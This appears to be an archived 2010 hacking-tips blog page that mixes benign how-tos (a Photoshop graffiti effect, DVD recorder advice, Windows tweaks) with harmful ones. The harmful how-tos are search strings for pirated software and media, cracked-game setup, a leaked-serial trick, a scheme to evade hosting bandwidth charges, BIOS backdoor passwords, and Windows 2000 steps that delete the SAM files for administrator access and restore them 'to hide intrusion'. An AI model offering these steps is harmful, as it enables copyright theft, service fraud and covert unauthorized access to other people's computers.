[meta content='0;url=http://www.mediapluss.com' http-equiv='refresh'/> 2010-03-21 ~ Hacking & Computer Tips

Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Wall Tutorial For
Photoshop Cs 8.0

For This Tutorial You Must Have A Basic Understanding Of Adobe Photoshop Cs 8.0, Example : Where The Features Of The Program Are.

For This Tutorial You Will Need The Font Called Political Graffiti FIll Which Can Be Aquired Here:


The Starting Wall Picture Which Can be Aquired Here:

(1). Open Photoshop Cs 8.0

(2). Open Wall Picture

(3). Type Ur Second Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(4). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(5). Distort Style Squeeze Vertical, Bend = -31%, Horizontal Distortion = +18%, Vertical Distortion = +34%

(6). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(7). Type Ur First Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(8). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(9). Distort Style Squeeze Vertical, Bend = +50%, Horizontal Distortion = 0%, Vertical Distortion = -31%

(10). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(11). Duplicate Both Layers

(12). Move Copied Layers One On Top Of The Other (In The Layer Menu)

(13). Hide The Original Ur Second Name And Ur First Name Layers By Clicking The Eye Icons So That They Dissapear.

(14). In The Copies, Right Click (One At A Time) And Click Rasterize Layer.

(15). Go to Layer> Merge Down (Ctrl + E) (On Top Name Layer).

(16). Layer> Layer Style> Stroke Change Color To Black, Size to 8, Then Opacity To 68%.

(17). Save If No Blur Effect Wanted

(18). Filter> Blur> Smart Blur> Mode: Overlay Edges, Threshhold 48%, Radius 6, Quality: High.

(19). Layer> New Layer

(20) Brush Tool (B), Paint Brush With The Soft 16pt Airbrush For Spraypaint Effect.

(21). Smuge Around Graffiti For Paint Smudge Look For Good Effect (Optional)

(22). Save.


Final Images:

Graffiti With Blur:

Graffiti No Blur:

Google Tips & Tricks, (utilizing search engine)

Utilizing search engines

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at


to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook

Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

Google secrets

Google secrets
method 1

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.


method 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

getting movies, mp3,games using google

okay lets keep this tutorial short. you want movies and games/mp3 / games and dont' know where to get them, thank god there is google.com
goto www.google.com

put this string in

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

notice that iam only changing the word after the parent directory, change it to what you want and you will get lots of goods. i got plenty of movie sites heh.

Getting Counter-Strike Source to work

Getting Counter-Strike Source to work

Step 1- Download cssource_notcracked_beta_emporio.rar, cssource_cracked_emporio.rar and cssource_updates_emporio.rar (make sure this update is V2).

Step 2- Extract cssource_notcracked_beta_emporio.rar to a folder (for this example we will use E:/CS: Source*), then extract cssource_cracked_emporio.rar to E:/CS: Source*(overwrite all files) and finally extract cssource_updates_emporio.rar(V2) to E:/CS: Source* (overwrite all files).

Step 3- Make a NEW steam account(We will use Bob1g2** for this example).

Step 4- Now here comes the tricky part. After you have made a NEW steam account, get any counter strike: condition zero key (and no i won't tell you one) off the internet. Launch steam and click on Condition Zero in the Avaible Games list. Click on Register this product and click next. Once you get to the point where it says, "Steam is processing you request" open up Task Manager (Ctrl, Alt, Delete at the same time) and click on steam.exe and once the steam window has 1 bar that is yellow, click terinate process on the task manager.

Step 5- Open up steam again and check if Condition Zero is in your My Games list. If it isn't then repeat Step 3 using a different key untill you get Condition Zero is your My Games list. Once you get it in your My Games list then, download Codename Gordon and once it has finished downloading, launch it. Once you get into the menu, then click exit.

Step 6- Go into the folder where you installed steam and copy ClientRegistry.blob into the folder where you installed CS: Source.

Step 7- Go into the folder where you installed CS: Source and open up SteamApp.cfg.

Step 8- Once you have opened up SteamApp.cfg, edit it so it only has this in it:


SteamInstallPath="E:/CS: Source*"
# [as is clearified later on, this should be your email address:]

Make sure you change the Bob1g2** bit to the new steam account you created and the E:/CS: Source* to where you installed counter-strike source.

Step 9- Make a sortcut of hl2.exe with these in the sortcut(without the quotes) "-steam -game cstrike"

*Change this to where you installed CS: Source.
**Change this to your new steam account.


cssource_notcracked_beta_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/cssource_notcracked_beta_emporio.rar

cssource_cracked_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_cracked_emporio.rar

cssource_updates_emporio.rar(v2)- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_updates_emporio.rar

Limit is 100 users max

Other things you should know

Don't download the V3 update since that doesn't work yet.

If you get a error saying that you are not subscribed, then do steps 4-6 to make it work again.

If you get unable to set mode then do this:
go to your registry -> HKEY_CURRENT_USER\Software\Valve\Source\Settings -> look up the entry "ScreenRefreshRate" -> doubleclick -> type your favourite monitor hz value into the field (i.e. 100hz, if your monitor can handle it) -> change the base setting from hexadecimal to decimal -> finished. (excerpt taken from flinkerhamster tutorial)

Some Servers



These servers have being tested by me and are working.

Getting A 1gb Yahoo China Account

Getting A 1gb Yahoo China Account

1. Sign for a yahoo ID... you can do this in my.yahoo.com. DO NOT check the automatically create an Email address
2. Clear ALL cookies
3. Activate mail account at cn.mail.yahoo.com
(you get 100Mb storage first *don't worry*), then sign-out
NOTE: FYI, the two boxes in the activation page is lastname and firstname

Upgrading to 1Gb Yahoo China Account
1. Sign-in to Yahoo Messenger, add a contact, sign-out
2. Go back to cn.mail.yahoo.com (all pages would be in Chinese)
3. Click the 1G orange label (graphic) *look at the lower right of the page*
4. Type-in your Yahoo ID and Password *look at the bottom of the page*
5. You'll go to two more Chinese pages (Just click the bottom centered label in the page)
6. Tadah!! Your upgraded to 1Gig and your default is English with Free POP3

There's no pesky graphic or flash ads at the moment... but your email add would be username[at]yahoo.com.cn

I think that's good enough for people without Gmail

Get unlimited bandwidth from your host for free

Get unlimited bandwidth from your host for free

NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP. (IP shared by two or more
websites/domains.) Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didnt require
much space, and didnt want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the acct, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'http://www.123.4.567.890/~user1/ ,
'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As
long as the nameservers dont change, that should have absolutly no
negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and
monitors the traffic that enters their space through the domain its
registered under. Being that the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
can't possibly go over bandwidth restrictions = free unlimited

Now the problems with this (besides the ethical ones) is that your
host may offer X amount of mail addys with the acct
(you@y...) and these will not work, as the name isnt on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up/w the ip/UN the host propagated to your
acct. Its at this point where you have to have a phenominal 10-15
character alphanumerical or better (#, &, etc) pw, or your site will
be vulnerable to attack since the attacker already has your UN. This
only gives attackers a slight advantage as the amount of time it
would take to brute force a 10 character pw @ a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and target
them accordingly from your site you have just freed up a signifigant
amount of space. The only setback/w this is having to keep an index
card or file around/w your pws, as you should never use the same one
twice, and want to use complicated ones.

Get The Music You Want To Hear

Found out a really cool way to get cool music without p2p progs or HTTP/FTP sites.Best thing of all:NO QUEUES,NO PASSWORDS...
Here it is:
1.Get Yahoo Messenger [BETA] here:

2.Wait for it to download,then run it and let it download another 5 MB or so.
3.Get FairStar MP3 Recorder here:

After testing Total Recorder and another prog,the FairStar product is the best RECORDING MP3s from a source,in our case the INTERNET RADIO.
4.Fire up LAUNCHcastRadion in Yahoo Messenger [BETA] and choose a station or a genre.
5.Start up FairStart MP3 Recorder,go to Record Options and CHECK autosetting,go to Encoder-MP3 and UN-CHECK enable VBR and choose 128 or 192 KBs.Also make sure you choose your OUTPUT folder and you're done.
6.Hit record or whatever and awaaaaaay you go.
More soon...

Get the Most Out of Your DVD Recorder

Get the Most Out of Your DVD Recorder

Assoc. Ed. PC World
Melissa J. Perenson

I admit it: I'm a former tape-a-holic. When I began using a VCR some 20 years ago (I ended up teaching Mom and Dad how to program the darn thing back then), I got hooked on the idea of creating my own video library, replete with everything from "Star Trek" episodes to gymnastics competitions.

Recently, however, I stopped recording video on tape and switched to DVD--and I haven't looked back. But after using several DVD recorders, I've identified some quirks and frustrations that are specific to frequent users like myself. Recording to DVD is very different from recording to tape; you encounter new types of hassles ranging from pesky so-called disc preparation times to annoying delays in ejecting discs and the challenge of creating visually appealing menus. The tips that follow are geared towards hardcore videophiles (you know who you are), but they're also applicable to the most casual user.

1. Choosing the Best Recorder for TV

If you've already bought your DVD recorder, skip to tip 2. But if you haven't, be prepared to be confused by a torrent of acronyms and options. DVD+R, DVD+RW, DVD-R, DVD-RW, DVD-RAM, EPGs ... and you thought buying an HDTV would be confusing.

When you walk into a store, chances are you won't be able to tell the differences between the slim DVD recorders gracing the shelves--at least, not at a glance. On the outside, they look virtually identical. And the only additional information you might get from the price tag or label is what format the recorder supports and whether it has a hard drive.

Don't stress so much about the formats. No single manufacturer supports all of the formats available; a couple of makers come close (Lite-On, Sony), supporting all but DVD-RAM. The - and + formats are quite similar, and either will get the recording job done.

I've personally observed that the - format discs tend to take longer to initialize and finalize. By longer, I'm talking about anywhere from 5 to 120 seconds, depending upon the unit--enough to be incredibly annoying when you're sitting in front of the TV, your finger eagerly hovering over the record button to start a recording, or the eject button so you can swap discs without missing any action.

If your goal is to record a lot of TV shows, then I can't recommend highly enough a DVD recorder with integrated TiVo service. Humax, Pioneer, and Toshiba all offer such recorders, which combine a hard drive of 80GB or greater with a DVD burner, and, of course, the TiVo service. The full-blown TiVo service costs extra ($299 for the lifetime of the unit, on top of the cost of the recorder) and adds two-week's worth of program guides, a season-pass feature that records all episodes of a show so you never miss your favorites, and artificial intelligence that finds and records programs you might enjoy. (A free limited version of TiVo's software that downloads electronic programming information for the next three days is integrated into these units at no added cost.)

I don't make this recommendation just because of TiVo's personalized recording features and friendly graphical interface. The reason I suggest going this route is that these recorders have an amazing capacity to automatically create navigational menus. All of the program data in TiVo's electronic program guide--as well as TiVo's visual menu navigation structure--conveniently transfers over to any disc you burn.

DVD recorders are typically limited in what they can do to label menus. When you record a disc, you end up with a generically labeled index, with thumbnails for each recording or "title" on the disc, and boring and uninformative labels like "Title 01" (with, perhaps, the time and date added for good measure). TiVo-enabled recorders, in contrast, provide disc menus with the series name, episode title, and even a program summary as well as the date and time of the recording. If you're recording to cheap write-once media, this feature is invaluable. If you're recording to rewritable media--which means you could conceivably edit the menu titles at some point--this capability is still a huge time-saver.

Avid videophiles who don't want to spring for TiVo should look for a DVD set-top unit with a high-capacity hard drive of 80GB or more and high-speed dubbing of at least 8X. So far, I've seen only one recorder with both high-speed dubbing capability and a high-capacity hard drive, but I imagine that more such units will be forthcoming--eventually.

Beware of units that bill themselves as having "high-speed" dubbing: In most cases, the manufacturer is using the term to denote recording speeds of 2X or 4X from the hard drive to DVD. Furthermore, some vendors are coming up with absurd-sounding dubbing speeds--for example, 32X, a number they derive based on how many hours' worth of recordings you can fit on a disc (8 hours at the lowest-quality recording mode), and the speed of the burner (4X in my example).

Where to start your search? I recommend browsing PC World's latest "Top 10 DVD Drives" chart:


2. Allow Extra Time

If you're preparing to record a program, budget a few extra minutes to get the unit ready. Believe me, the seconds add up--as I learned during my recording marathon of the Athens Olympiad. You need to factor in up to 30 seconds for the recorder to boot, about 10 to 20 seconds for the disc to spin up, and at least another 30 to 45 seconds for the recorder to prepare the disc for recording (your unit might say "initialize" or "format"). That's all before you can hit Record.

And when you're through recording, expect to wait 30 to 60 seconds to regain control of the recorder after you hit Stop. With some models, the delay occurs after you hit Eject. Either way, that delay could mean you'll miss the beginning of the next gymnast's routine--and none of this takes into account disc finalization, which can take another 30 seconds to 3 minutes, depending upon the disc's format and how much of it you've used.

3. Finalize, Finalize, Finalize

Disc finalization is the process that closes the disc so it can be read in other devices, such as a DVD player, DVD recorder, or DVD-ROM drive. It's also a process that bites. There, I've said it.

Finalization is the dirty little secret of DVD recorders: It's a time-consuming extra step that users of the venerable VCR don't expect. And it requires more effort than it should, due to poor menu design on DVD recorders. I've yet to see a recorder that makes this step truly easy--all of them bury it under a setup or menu item, and all of them require far too many clicks and layers considering this is a N-E-C-E-S-S-A-R-Y step for every write-once DVD-R or DVD+R you burn.

I recommend finalizing your disc as soon you're through recording. Due to quality issues, you'll likely record only a maximum of 2 hours of television per disc, which means that no more than two weeks will pass between finalization sessions. This way, when you go back to a recorded disc, it will be ready to play in any DVD player--whether it's the $30 Costco special in your bedroom or your laptop's DVD-ROM drive.

Caution: You might think you don't need to finalize if you don't have more than one DVD player or drive, and you plan on playing your DVD on your own recorder only. But what happens when, inevitably, you upgrade your recorder to a swankier, newer model? Or, even worse, when the model you're using now isn't working five years down the line? Then what? You'll be left with a library full of unreadable discs. Although you might be able to recover the raw video data from an unfinalized disc using a program like Infinadyne's CD/DVD Diagnostic, the process is tedious and time-consuming. Also, don't count on scavenging a backup unit off EBay in a few years: As I've learned, discs may not be interchangeable, even between two recorder decks bearing the same model number from the same manufacturer.

4. Don't Abuse Your Discs

It's easy to leave discs out of their cases, lying around or stacking up as you swap 'em out for a new one. But avoid that temptation--the dust will damage your discs, and you increase the chances of accidental scratches and scuffs.

Also, avoid leaving your recorded DVDs near a sunny window. The disc's dye layer is susceptible to light and heat; if either affects the disc, its data may become unreadable.

Finally, clean your discs carefully. Use a lint-free cloth, compressed air, or a liquid cleanser intended for use with DVD media. Dust and other airborne particles can scratch your disc, which could result in data loss. When cleaning with a lint-free cloth, stroke from the inside of the hub to the outside of the disc. Never use a circular motion from the inside out; and never use a tissue, paper towel, or other random rag.

For more on how to treat your discs, read
"Ten Tips for Durable DVDs":


5. Choose Your Media--and Labels--Wisely

A cheap spindle of media is tempting, but then you have to buy cases separately. And what cases to buy? Small plastic jewel cases? DVD movie-size cases? The combinations can be frustrating, at best.

Spindles are indeed affordable, but don't buy them without buying cases, too--and keep both stashed near your TV and DVD recorder setup, so you can easily grab a disc from the recorder and place it into its case. Otherwise, it's way too easy for stacks of discs to pile up--a no-no, as I note in tip 4.

Also, consider buying discs that come in oversized movie-style plastic cases. You'll pay a little more, but the convenience is worth it. Plus, you'll get a cardstock insert that you can use to create handwritten labels. If you get a high-speed dubbing unit, make sure you buy media that matches the recorder's speed.

If you do buy spindle media, keep in mind that the cases you buy in bulk may not have an insert on which you can scribble. If the case lack inserts, improvise with a piece of letter-size paper, folded over or cut up to fit accordingly. Spend a little more money, and you can get cardstock inserts.

There are a host of labeling software options out there to help you craft your labels. Read the following two "Burning Questions" columns for a comprehensive review of the subject:

"The Joy of Labeling":


"Is Labeling Software Worth the Hassle?":


But all of these options are going to require you to move your labeling operation over to the PC--something that may not work into your recording work flow.

Other PC-based labeling options include printable media that you can use with an inkjet printer. I'd stay away from adhesive labels, though: They're difficult to apply evenly, and could cause problems if the disc is poorly manufactured.

If you're trying to keep your labeling efforts nearer to your TV, I'd suggest using water-based pens to write on the discs, and on the label inserts, too, while you're at it. Another possibility: If your handwriting is barely better than chicken scrawl, then it's worth buying a battery-operated labeler, such as those offered by Brother or Casio. Both companies offer half-inch-wide labels that fit well along the spine of a DVD movie case.

Get in windows 2000 as Administrator.

Get in windows 2000 as Administrator.
> NOTE: Requires a boot disk.
> Get the command prompt and go to C:\winnt\sytem32\config\ and do
the following commands:
> attrib -a -r -h
> copy sam.* a:\
> del Sam.*
> reboot the computer. there should be no administrator password.
just put in administrator and hit enter. replace the sam files to
restore the password to hide intrusion.

No Text Icons

No Text Icons

If you would like your desktop Icons to have no text underneath then try this tweak:

Right click the icon and select "Rename"

Now hold the "Alt" key and type "255" and hit Enter

NOTE : It may only work with the keypad numbers and not the number keys on top of the keyboard.

Open Windows Explorer to a Different Default Directory

Open Windows Explorer to a Different Default Directory

When you open Windows Explorer (by choosing the Window key and "E" simultaneously or by choosing Start, all Programs, Accessories, Windows Explorer), you can change the directory that appears by default. If you choose Start, all Programs, Accessories, and then right-click on Windows Explorer and choose Properties, you can modify the "Target" directory. To go to your C: drive, type simply C:\ in the Target box and choose OK. You can also enter a shortcut key on this screen, telling Windows the character or combination of characters you want to type to automatically open Windows Explorer. You can even change the icon or specify that you always want Explorer to open up in full-screen mode.

Running A Board forum From Your Own Pc

Running A Board forum From Your Own Pc

If you wish to install php and mysql to run a phpBB installation on your computer, first you will need installers. Most of you have windows, so I recommend FoxServ. This is a great program that installs php, mysql, and more on your windows machine in under a minute, excluding dowanload time.

Download foxserv 3.0 from http://www.foxserv.net/

Run the foxserv install program, it is pretty self explanatory, just do what it says.

After you get everything installed, run the foxserv control panel and click the install buttons for everything.

Open winmysql ADMIN. Create a new username and pass at start-up, and then create a new database, the one you will be using for your phpBB installation.

Now download phpBB 2.0.x from phpbb.com, or download phpBBplus from http://www.phpbb2.de/phpbb2plus/phpBB2_plus_1.2.zip.

Unzip the phpBB2 folder into C:\Foxserv\www\

After you have done such, visit http://localhost/phpBB2/ to view your install page. enter the correct information.
database name: the name of the database you created.
database username: username you created
database password: password you created

then enter your email information and everything else as it should be. Now delete the install and contrib directories from the phpBB2 folder on your computer.

Voila! All set up. If you want to have other people view your site, then you need a forwarding service. I have a dynamic IP, so I use http://www.dynu.com. Register an account there and follow all of their instructions if you have a dynamic IP. Now you should visit http://yoursite.dynu.com/ to make sure everything worked.

Also, windows xp users BE SURE TO INSTALL SERVICE PACK 1. SP1 fixes critical incompatibility issues with the apache 2.x server that prevents it from using php correctly. If you do not have service pack one, php pages will load incorrectly or not at all on your webserver.

I posted this because I was fed up with trying to find a host that supports php and mysql and doesnt have any ads on it.

NOTE: You wont get any HOST that will allows you WAREZ, then you can use your own pc as your own HOST

another program that works well is phpdev5 i have used it for a long time. and another site to register a dns name is http://dyndns.org it gives you better names, for example mine is http://shag.kicks-*ss.net.

Saving and loading actions

Saving and loading actions

Actions are automatically saved to the Actions Palette folder in the Adobe Photoshop or Adobe ImageReady CS Settings folder. If this file is lost or removed, the actions you created are lost. You can save your actions to a separate actions file so that you can recover them if necessary. You can also load a variety of action sets that are shipped with Photoshop (Photoshop).

Note: The default location of the Adobe Photoshop CS Settings folder varies by operating system. Use your operating system's Find command to locate this folder.

To save a set of actions:

1. Select a set.
2. Choose Save Actions from the Actions palette menu.
3. Type a name for the set, choose a location, and click Save.

You can save the set anywhere. However, if you place the file in the Presets/Photoshop Actions folder inside the Photoshop program folder, the set will appear at the bottom of the Actions palette menu after you restart the application.

Press Ctrl+Alt (Windows) or Command+Option (Mac OS) when you choose the Save Actions command to save the actions in a text file. You can use this file to review or print the contents of an action. However, you can't reload the text file back into Photoshop.

To load a set of actions:

Do one of the following:
* Choose Load Actions from the Actions palette menu. Locate and select the action set file, and then click Load. (In Windows, Photoshop action set files have the extension .atn.)
* Select an action set from the bottom of the Actions palette menu.

To restore actions to the default set:

1. Choose Reset Actions from the Actions palette menu.
2. Click OK to replace the current actions in the Actions palette with the default set, or click Append to add the set of default actions to the current actions in the Actions palette.

Turn MSN Messenger Display Pix into User Pix on XP

How to turn MSN Messenger Display Pictures into User Pictures on XP
For the pix you downloaded from MSN

If you’ve ever wanted to turn the display pictures you download from MSN into an account picture (the one that appears in your Start Menu next to your username) for XP here’s how.

1) In messenger Choose ==> Change Display Picture and then ==> Download more pictures.

2) Download the desired images.

3) Open 'Folder Options' in Explorer and make sure you can view Hidden Files and folders.

4) Navigate to X:\Documents and Settings\User_Name\Application Data\Microsoft\MSN Messenger, where X: is the drive XP is on and User_Name is your username.

5) In here you'll see folders with long numbers for names. The next bit is trial and error. If you go into each of the folders you should see that some of them have a folder called UserTile inside of them. In that directory it will have .dat files. The files which have TFR in their names are the images (to make your life easier there is a list at the bottom showing which file is which for a few of them).

6) Going through all the UserTile folders copy these .dat files to a new folder. Now rename them and change their extension from .dat to .bmp by right clicking on them and choosing 'Rename'. Then try to open them in MS Paint or the Windows Fax and Picture Viewer. Not all of them will work (I'm not sure if this is just because some of them aren't actually image files, but any you downloaded should do).

7) If you want to edit them open them up in MS Paint and then make changes there or copy and paste them into your favourite image editor (opening directly doesn't seem to work as the formats are bit messed up from the renaming). Make any changes you want and save (either as BMP, JPEG, GIF or PNG).

8) Go to Control Panel ==> User Accounts

9) Click on your account and then choose 'Change my picture', then select 'Browse for more pictures'.

10) Browse to the image you just saved and select 'Open' and that's it!

11) You can also use the image as your SoD avatar - to do so you'll have to resize the image to being 64 X 64 pixels and save as either (gif, jpeg, swf, png). If you are uploading it to SoD make sure it's less than 20 KB. Otherwise upload to a web server and enter it's URL in the space provided and press 'Update Avatar'.

A list to help you identify the file you want:


TFR1C - Spider
TFR3F - Leaf
TFRRB - Jellyfish
TFRRC - Ladybug

N.B. The codes above may change, I'm not sure. I may add more files to the list later on.

Get the serial number you need !

Get the serial number you need ! (For Certain Things)

* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.


Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

See these example searches:

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

Ultimate Google Way

Ultimate Google Way

Look for Appz in Parent Directory

intext:"parent directory" intext:"[EXE]"

intext:"parent directory" index of:"[EXE]"

intext:"parent directory" index of:"[RAR]"

This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.

Look for Moviez in Parent Directory

intext:"parent directory" intext:"[VID]"

intext:"parent directory" index of:"[VID]"

This will look for any video filetype in parent directory. You can optionaly add index:"xvid" or intext:"divx" for specific codec movie.

Look for Muzik in Parent Directory

intext:"parent directory" intext:"[MP3]"

intext:"parent directory" index of:"[MP3]"

This will look for any music files.

Look for Gamez in Parent Directory

intext:"parent directory" index of:"[Gamez]"

How to Bypass BIOS Passwords

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.

Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

589589 589721 595595 598598

AMI BIOS backdoor passwords:


PHOENIX BIOS backdoor passwords:



ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj


Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
